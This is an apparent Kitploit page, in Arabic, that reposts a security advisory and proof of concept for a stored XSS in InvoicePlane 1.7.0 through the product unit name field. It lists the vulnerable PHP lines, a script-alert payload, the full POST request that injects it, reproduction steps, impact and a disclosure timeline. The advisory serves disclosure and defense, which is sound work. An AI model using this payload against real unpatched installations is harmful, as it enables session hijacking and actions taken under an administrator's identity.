Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-25596 — إثبات مفهوم لثغرة XSS مخزنة في InvoicePlane 1.7.0 عبر حقل اسم وحدة المنتج، بما في ذلك مواقع الكود المعرضة للخطر وخطوات إعادة الإنتاج. | Kitploit
أدوات/GitHubGitHub/lagathos/cve-2026-25596
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHublagathos/cve-2026-25596

CVE-2026-25596

إثبات مفهوم لثغرة XSS مخزنة في InvoicePlane 1.7.0 عبر حقل اسم وحدة المنتج، بما في ذلك مواقع الكود المعرضة للخطر وخطوات إعادة الإنتاج.

عرض المستودع
منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-25596 — تخزين XSS عبر حقل اسم وحدة المنتج في InvoicePlane 1.7.0

الثغرة: تخزين Cross-Site Scripting (XSS) عبر حقل اسم وحدة المنتج

المنتج: InvoicePlane

الإصدار المتأثر: 1.7.0 (وعلى الأرجح الإصدارات السابقة)

الخطورة: متوسطة

درجة CVSS 3.1: 4.8 (CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N)

CWE: CWE-79: عدم تحييد المدخلات بشكل صحيح أثناء توليد صفحة الويب

اكتشفها: Leonidas Agathos

تاريخ التقرير: 2026-01-31


الوصف

تقبل حقول unit_name و unit_name_plrl في نموذج وحدة المنتج (/index.php/units/form) أي مدخلات دون تعقيم. يتم تخزين القيم وعرضها بدون ترميز في قائمة عناصر الفاتورة عند عرض أي فاتورة تحتوي على منتج يستخدم الوحدة الخبيثة.

الملفات المعرضة للخطر:

  • application/modules/invoices/views/partial_itemlist_table.php:127
  • application/modules/invoices/views/partial_itemlist_responsive.php:71
  • root@kitploit:~
    // partial_itemlist_table.php - Line 127
    <?php echo $unit->unit_name . '/' . $unit->unit_name_plrl; ?>
    
    // partial_itemlist_responsive.php - Line 71
    <?php echo $unit->unit_name . '/' . $unit->unit_name_plrl; ?>
    

    إثبات المفهوم

    الخطوة 1 — حقن الحمولة في اسم الوحدة

    انتقل إلى /index.php/units/form وأرسل ما يلي كاسم الوحدة:

    root@kitploit:~
    <script>alert("XSS in Product Unit")</script>
    

    الطلب:

    root@kitploit:~
    POST /index.php/units/form/1 HTTP/1.1
    Host: 172.25.0.12
    Content-Type: application/x-www-form-urlencoded
    
    _ip_csrf=...&btn_submit=1&is_update=1&unit_name=%3Cscript%3Ealert%28%22XSS+in+Product+Unit%22%29%3C%2Fscript%3E&unit_name_plrl=tests
    

    الخطوة 1 - حقن حمولة XSS في حقل اسم الوحدة عبر Burp Suite

    الخطوة 2 — تشغيل XSS

    1. أنشئ منتجًا باستخدام الوحدة الخبيثة
    2. أضف هذا المنتج إلى أي فاتورة
    3. انتقل إلى /index.php/products/form/1 أو اعرض أي فاتورة تحتوي على المنتج

    يتم تشغيل الحمولة عند عرض قائمة العناصر.

    الخطوة 2 - تنفيذ XSS عند عرض قائمة منتجات تحتوي على الوحدة الخبيثة


    التأثير

    يتم تنفيذ الحمولة في متصفح أي مسؤول يعرض فاتورة أو صفحة منتج تتضمن الوحدة الخبيثة. وهذا يتيح اختطاف الجلسة (إذا لم تكن ملفات تعريف الارتباط HttpOnly)، وسرقة رموز CSRF، وتنفيذ إجراءات بهوية الضحية.


    الجدول الزمني

    التاريخالحدث
    2026-01-30اكتشاف الثغرة
    2026-01-31تطوير إثبات المفهوم
    2026-01-31إخطار البائع
    2026-02-04إقرار البائع
    2026-02-04إصدار التصحيح
    2026-02-05الكشف العام

    المراجع

    • CWE-79
    • OWASP: Cross-Site Scripting (XSS)
    • CVE-2026-25596

    إخلاء المسؤولية

    تم اكتشاف هذه الثغرة أثناء بحث أمني مستقل. يتم توفير جميع المعلومات strictly لأغراض تعليمية وبحثية ودفاعية لمساعدة البائع والمجتمع الأمني في فهم المشكلة ومعالجتها. أي استخدام خبيث لهذه المعلومات محظور تمامًا.

    تنزيل الأداة